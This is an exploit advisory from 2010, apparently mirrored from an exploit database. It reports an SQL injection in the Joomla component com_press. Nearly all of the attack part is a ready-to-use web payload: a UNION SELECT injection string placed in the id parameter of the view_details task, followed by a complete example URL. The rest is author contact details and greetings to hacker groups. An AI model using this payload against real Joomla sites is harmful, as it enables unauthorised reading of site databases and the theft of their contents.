id: 11620
date: 04/04/2010
title: Joomla Component com_press SQL Injection Vulnerability
author: DevilZ TM
cves: 

======================================================
Joomla Component com_press SQL Injection Vulnerability
======================================================

# Title : Joomla Component com_press SQL Injection Vulnerability
# Author: DevilZ TM
 
[~]######################################### InformatioN #############################################[~]
  
[~] Title     : Joomla Component com_press SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l.blackhat
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
  
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_press&task=view_details&id=[SQL]
  
[~] ExploiT         :
  
-1+UNION+SELECT+1,2,3,4,5,6,7--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_press&task=view_details&id=-1+UNION+SELECT+1,2,3,4,5,6,7--
 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks To My Best FriendS :
  
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
  
[~] IRANIAN Young HackerZ
  
[~] GreetZ : Exploit-DB TeaM
 
[~]#########################################   FinisH :D   #############################################[~]



#  0day.today [2023-03-22]  #